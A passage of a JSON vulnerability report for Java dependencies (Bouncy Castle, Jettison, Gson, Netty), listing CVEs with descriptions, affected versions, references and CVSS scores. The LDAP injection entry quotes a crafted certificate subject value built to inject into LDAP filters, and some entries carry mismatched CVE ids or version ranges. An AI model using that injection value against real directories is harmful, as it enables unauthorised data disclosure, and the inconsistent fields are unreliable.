an attacker is able to observe timing 
information for the generation of multiple deterministic ECDSA signatures."}],"product_status":{"known_affected":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.65.01"],"known_not_affected":["org.bouncycastle/bcprov-jdk15on@1.66"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15522"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15522"},{"summary":"NetApp Advisory ntap-20210622-0007","url":"https://security.netapp.com/advisory/ntap-20210622-0007"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":5.1,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.1,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.1,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.65.01"]}],"title":"CVE-2020-15522/pkg:maven/org.bouncycastle/bcprov-jdk15on@1.55?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-26939"]}],"cve":"CVE-2020-26939","cwe":{"id":"203","name":"Observable Discrepancy"},"discovery_date":"2021-04-22T16:16:49","ids":[{"system_name":"CVE Record","text":"CVE-2020-26939"},{"system_name":"NetApp Advisory","text":"ntap-20201202-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Observable Differences in Behavior to Error Inputs in Bouncy Castle"},{"category":"details","details":"Vulnerability Details","text":"# Observable Differences in 
Behavior to Error Inputs in Bouncy Castle In Legion of the Bouncy Castle BC before 1.55 and BC-FJA before 1.0.2, attackers can obtain sensitive information about a private exponent because of Observable Differences in Behavior to Error Inputs. This occurs in org.bouncycastle.crypto.encodings.OAEPEncoding. Sending invalid ciphertext that decrypts to a short payload in the OAEP Decoder could result in the throwing of an early exception, potentially leaking some information about the private exponent of the RSA private key performing the encryption."}],"product_status":{"known_affected":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.60"],"known_not_affected":["org.bouncycastle/bcprov-jdk15on@1.55"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8c36ba34e80e05eecb1f80071cc834d705616f315b634ec0c7d8f42e@%3Cissues.solr.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/11/msg00007.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26939"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26939"},{"summary":"NetApp Advisory 
ntap-20201202-0005","url":"https://security.netapp.com/advisory/ntap-20201202-0005"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.60"]}],"title":"CVE-2020-26939/pkg:maven/org.bouncycastle/bcprov-jdk15on@1.55?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-33201"]}],"cve":"CVE-2023-33201","cwe":{"id":"295","name":"Improper Certificate Validation"},"discovery_date":"2023-07-05T03:30:23","ids":[{"system_name":"CVE Record","text":"CVE-2023-33201"},{"system_name":"NetApp Advisory","text":"ntap-20230824-0008"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Bouncy Castle For Java LDAP injection vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Bouncy Castle For Java LDAP injection vulnerability Bouncy Castle provides the `X509LDAPCertStoreSpi.java` class which can be used in conjunction with the CertPath API for validating certificate paths. Pre-1.73 the implementation did not check the X.500 name of any certificate, subject, or issuer being passed in for LDAP wild cards, meaning the presence of a wild car may lead to Information Disclosure. 
A potential attack would be to generate a self-signed certificate with a subject name that contains special characters, e.g: `CN=Subject*)(objectclass=`. This will be included into the filter and provides the attacker ability to specify additional attributes in the search query. This can be exploited as a blind LDAP injection: an attacker can enumerate valid attribute values using the boolean blind injection technique. The exploitation depends on the structure of the target LDAP directory, as well as what kind of errors are exposed to the user. Changes to the `X509LDAPCertStoreSpi.java` class add the additional checking of any X.500 name used to correctly escape wild card characters."}],"product_status":{"known_affected":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.49|<=1.70"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/08/msg00000.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-33201"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-33201"},{"summary":"NetApp Advisory 
ntap-20230824-0008","url":"https://security.netapp.com/advisory/ntap-20230824-0008"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.49|<=1.70"]}],"title":"CVE-2023-33201/pkg:maven/org.bouncycastle/bcprov-jdk15on@1.55?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-33202"]}],"cve":"CVE-2023-33202","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-11-23T18:30:33","ids":[{"system_name":"CVE Record","text":"CVE-2023-33202"},{"system_name":"NetApp Advisory","text":"ntap-20240125-0001"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Bouncy Castle Denial of Service (DoS)"},{"category":"details","details":"Vulnerability Details","text":"# Bouncy Castle Denial of Service (DoS) Bouncy Castle for Java before 1.73 contains a potential Denial of Service (DoS) issue within the Bouncy Castle org.bouncycastle.openssl.PEMParser class. This class parses OpenSSL PEM encoded streams containing X.509 certificates, PKCS8 encoded keys, and PKCS7 objects. 
Parsing a file that has crafted ASN.1 data through the PEMParser causes an OutOfMemoryError, which can enable a denial of service attack."}],"product_status":{"known_affected":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.70"],"known_not_affected":["org.bouncycastle/bcprov-jdk15on@1.73"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-33202"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-33202"},{"summary":"NetApp Advisory ntap-20240125-0001","url":"https://security.netapp.com/advisory/ntap-20240125-0001"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.70"]}],"title":"CVE-2023-33202/pkg:maven/org.bouncycastle/bcprov-jdk15on@1.55?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-40149"]}],"cve":"CVE-2022-40149","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-17T00:00:41","ids":[{"system_name":"CVE Record","text":"CVE-2022-40149"},{"system_name":"Debian Advisory","text":"dsa-5312"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability 
Description","text":"Jettison parser crash by stackoverflow"},{"category":"details","details":"Vulnerability Details","text":"# Jettison parser crash by stackoverflow Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. This effect may support a denial of service attack."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.0"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/11/msg00011.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40149"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40149"},{"summary":"Debian Advisory dsa-5312","url":"https://www.debian.org/security/2023/dsa-5312"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.0"]}],"title":"CVE-2022-40149/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-45685"]}],"cve":"CVE-2022-45685","cwe":{"id":"787","name":"Out-of-bounds 
Write"},"discovery_date":"2022-12-13T15:30:26","ids":[{"system_name":"CVE Record","text":"CVE-2022-45685"},{"system_name":"Debian Advisory","text":"dsa-5312"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Jettison Out-of-bounds Write vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Jettison Out-of-bounds Write vulnerability A stack overflow in Jettison before v1.5.2 allows attackers to cause a Denial of Service (DoS) via crafted JSON data."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45685"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45685"},{"summary":"Debian Advisory dsa-5312","url":"https://www.debian.org/security/2023/dsa-5312"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]}],"title":"CVE-2022-45685/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-45693"]}],"cve":"CVE-2022-45693","c
we":{"id":"787","name":"Out-of-bounds Write"},"discovery_date":"2022-12-13T15:30:27","ids":[{"system_name":"CVE Record","text":"CVE-2022-45693"},{"system_name":"Debian Advisory","text":"dsa-5312"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Jettison Out-of-bounds Write vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Jettison Out-of-bounds Write vulnerability Jettison before v1.5.2 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45693"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45693"},{"summary":"Debian Advisory 
dsa-5312","url":"https://www.debian.org/security/2023/dsa-5312"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]}],"title":"CVE-2022-45693/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-1436"]}],"cve":"CVE-2023-1436","cwe":{"id":"674","name":"Uncontrolled Recursion"},"discovery_date":"2023-03-22T06:30:21","ids":[{"system_name":"CVE Record","text":"CVE-2023-1436"},{"system_name":"JFrog Advisory","text":"jettison-json-array-dos-xray-427911"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Jettison vulnerable to infinite recursion"},{"category":"details","details":"Vulnerability Details","text":"# Jettison vulnerable to infinite recursion An infinite recursion is triggered in Jettison when constructing a JSONArray from a Collection that contains a self-reference in one of its elements. 
This leads to a StackOverflowError exception being thrown."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.3"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-1436"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-1436"},{"summary":"JFrog Advisory jettison-json-array-dos-xray-427911","url":"https://research.jfrog.com/vulnerabilities/jettison-json-array-dos-xray-427911"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.3"]}],"title":"CVE-2023-1436/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-40150"]}],"cve":"CVE-2022-40150","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-09-17T00:00:41","ids":[{"system_name":"CVE Record","text":"CVE-2022-40150"},{"system_name":"Debian Advisory","text":"dsa-5312"}],"notes":[{"audience":"developers","category":"other","text":"Uncontrolled Recursion","title":"Additional CWE: 674"},{"category":"description","details":"Vulnerability Description","text":"Jettison memory exhaustion"},{"category":"details","details":"Vulnerability Details","text":"# Jettison 
memory exhaustion Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by Out of memory. This effect may support a denial of service attack."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40150"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40150"},{"summary":"Debian Advisory dsa-5312","url":"https://www.debian.org/security/2023/dsa-5312"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]}],"title":"CVE-2022-40150/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-25647"]}],"cve":"CVE-2022-25647","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2022-05-03T00:00:44","ids":[{"system_name":"CVE Record","text":"CVE-2022-25647"},{"system_name":"Snyk 
Advisory","text":"SNYK-JAVA-COMGOOGLECODEGSON-1730327"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5227"},{"system_name":"NetApp Advisory","text":"ntap-20220901-0009"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of Untrusted Data in Gson"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of Untrusted Data in Gson The package `com.google.code.gson:gson` before 2.8.9 is vulnerable to Deserialization of Untrusted Data via the `writeReplace()` method in internal classes, which may lead to denial of service attacks. ## Related CVE(s) CVE-2022-25647, SNYK-JAVA-COMGOOGLECODEGSON-1730327"}],"product_status":{"known_affected":["com.google.code.gson/gson@vers:maven/>=1.1|<=2.8.8"],"known_not_affected":["com.google.code.gson/gson@2.8.9"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/05/msg00015.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/09/msg00009.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25647"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25647"},{"summary":"NetApp Advisory ntap-20220901-0009","url":"https://security.netapp.com/advisory/ntap-20220901-0009"},{"summary":"Snyk Advisory SNYK-JAVA-COMGOOGLECODEGSON-1730327","url":"https://snyk.io/vuln/SNYK-JAVA-COMGOOGLECODEGSON-1730327"},{"summary":"Debian Advisory dsa-5227","url":"https://www.debian.org/security/2022/dsa-5227"},{"summary":"Oracle Advisory 
cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.7,"baseSeverity":"HIGH","confidentialityImpact":"LOW","environmentalScore":7.7,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.7,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H","version":"3.1"},"products":["com.google.code.gson/gson@vers:maven/>=1.1|<=2.8.8"]}],"title":"CVE-2022-25647/pkg:maven/com.google.code.gson/gson@2.8.0?type=jar"},{"acknowledgements":[{"organization":"Mitre"}],"cve":"CVE-2021-21290","cwe":{"id":"378","name":"Creation of Temporary File With Insecure Permissions"},"discovery_date":"2022-05-10T08:46:50","ids":[{"system_name":"CVE Record","text":"CVE-2022-24823"},{"system_name":"GitHub Advisory","text":"GHSA-269q-hmxg-m83q"},{"system_name":"GitHub Advisory","text":"GHSA-5mcr-gq6c-3hq2"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"NetApp Advisory","text":"ntap-20220616-0004"}],"notes":[{"audience":"developers","category":"other","text":"Creation of Temporary File in Directory with Insecure Permissions","title":"Additional CWE: 379"},{"audience":"developers","category":"other","text":"Exposure of Resource to Wrong Sphere","title":"Additional CWE: 668"},{"category":"description","details":"Vulnerability Description","text":"Local Information Disclosure Vulnerability in io.netty:netty-codec-http"},{"category":"details","details":"Vulnerability Details","text":"# Local Information Disclosure Vulnerability in io.netty:netty-codec-http 
### Description ### [GHSA-5mcr-gq6c-3hq2](https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2) (CVE-2021-21290) contains an insufficient fix for the vulnerability identified. ### Impact ### When netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. ### Vulnerability Details ### To fix the vulnerability the code was changed to the following: ```java @SuppressJava6Requirement(reason = \"Guarded by version check\") public static File createTempFile(String prefix, String suffix, File directory) throws IOException { if (javaVersion() >= 7) { if (directory == null) { return Files.createTempFile(prefix, suffix).toFile(); } return Files.createTempFile(directory.toPath(), prefix, suffix).toFile(); } if (directory == null) { return File.createTempFile(prefix, suffix); } File file = File.createTempFile(prefix, suffix, directory); // Try to adjust the perms, if this fails there is not much else we can do... file.setReadable(false, false); file.setReadable(true, true); return file; } ``` Unfortunately, this logic path was left vulnerable: ```java if (directory == null) { return File.createTempFile(prefix, suffix); } ``` This file is still readable by all local users. ### Patches ### Update to 4.1.77.Final ### Workarounds ### Specify your own `java.io.tmpdir` when you start the JVM or use `DefaultHttpDataFactory.setBaseDir(...)` to set the directory to something that is only readable by the current user or update to Java 7 or above. 
### References ### - [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html) - [CWE-379: Creation of Temporary File in Directory with Insecure Permissions](https://cwe.mitre.org/data/definitions/379.html) ### For more information ### If you have any questions or comments about this advisory: Open an issue in [netty](https://github.com/netty/netty) ## Related CVE(s) CVE-2021-21290, CVE-2022-24823, GHSA-5mcr-gq6c-3hq2"}],"product_status":{"known_affected":["io.netty/netty-codec-http@vers:maven/>=4.0.0.Alpha1|<=4.1.9.Final"]},"references":[{"summary":"GitHub Advisory GHSA-269q-hmxg-m83q","url":"https://github.com/netty/netty/security/advisories/GHSA-269q-hmxg-m83q"},{"summary":"GitHub Advisory GHSA-5mcr-gq6c-3hq2","url":"https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-24823"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-24823"},{"summary":"NetApp Advisory ntap-20220616-0004","url":"https://security.netapp.com/advisory/ntap-20220616-0004"},{"summary":"Oracle Advisory 
cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["io.netty/netty-codec-http@vers:maven/>=4.0.0.Alpha1|<=4.1.9.Final"]}],"title":"CVE-2021-21290/pkg:maven/io.netty/netty-codec-http@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-43797"]}],"cve":"CVE-2021-43797","cwe":{"id":"444","name":"Inconsistent Interpretation of HTTP Requests"},"discovery_date":"2021-12-09T19:09:17","ids":[{"system_name":"CVE Record","text":"CVE-2021-43797"},{"system_name":"GitHub Advisory","text":"GHSA-wx5j-54mm-rqqq"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5316"},{"system_name":"NetApp Advisory","text":"ntap-20220107-0003"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"HTTP request smuggling in netty"},{"category":"details","details":"Vulnerability Details","text":"# HTTP request smuggling in netty ### Impact Netty currently just skips control chars when these are present at the beginning / end of the header name. We should better fail fast as these are not allowed by the spec and could lead to HTTP request smuggling. 
Failing to do the validation might cause netty to \"sanitize\" header names before it forward these to another remote system when used as proxy. This remote system can't see the invalid usage anymore and so not do the validation itself."}],"product_status":{"known_affected":["io.netty/netty-codec-http@vers:maven/>=4.0.0|<4.1.71.Final"],"known_not_affected":["io.netty/netty-codec-http@4.1.71.Final"]},"references":[{"summary":"GitHub Advisory GHSA-wx5j-54mm-rqqq","url":"https://github.com/netty/netty/security/advisories/GHSA-wx5j-54mm-rqqq"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-43797"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-43797"},{"summary":"NetApp Advisory ntap-20220107-0003","url":"https://security.netapp.com/advisory/ntap-20220107-0003"},{"summary":"Debian Advisory dsa-5316","url":"https://www.debian.org/security/2023/dsa-5316"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory 
